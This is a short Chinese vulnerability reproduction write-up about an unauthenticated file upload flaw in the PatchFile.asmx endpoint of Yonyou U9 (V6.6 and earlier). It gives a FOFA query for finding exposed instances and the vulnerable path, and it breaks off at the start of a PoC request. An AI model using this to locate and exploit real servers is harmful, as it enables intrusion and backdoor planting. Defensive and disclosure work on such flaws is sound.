0x01 产品简介
用友U9是以“实时企业,全球商务(Real Time Enterprise on Global Business)”为核心理念,帮助目标客户实时业务处理、实时信息反馈、实时绩效监控、实时市场响应的管理软件。 它促使企业的业务实现集成和协作;对其关键流程及时处理,实现更快的市场响应;帮助高级管理人员做出果断明智的决策;可以快速实施、低成本部署;并降低风险,帮助客户避免突发事件带来的灾难。
0x02 漏洞概述
用友U9 PatchFile.asmx接口处存在文件上传漏洞,未经身份验证的攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个 web 服务器。
0x03 影响范围
用友U9 <= V6.6企业版
0x04 复现环境
FOFA:
title==" U9-登录 "
0x05 漏洞复现
/CS/Office/AutoUpdates/PatchFile.asmx?op=SaveFile
出现以上情况则可能存在漏洞
PoC
POST /CS/O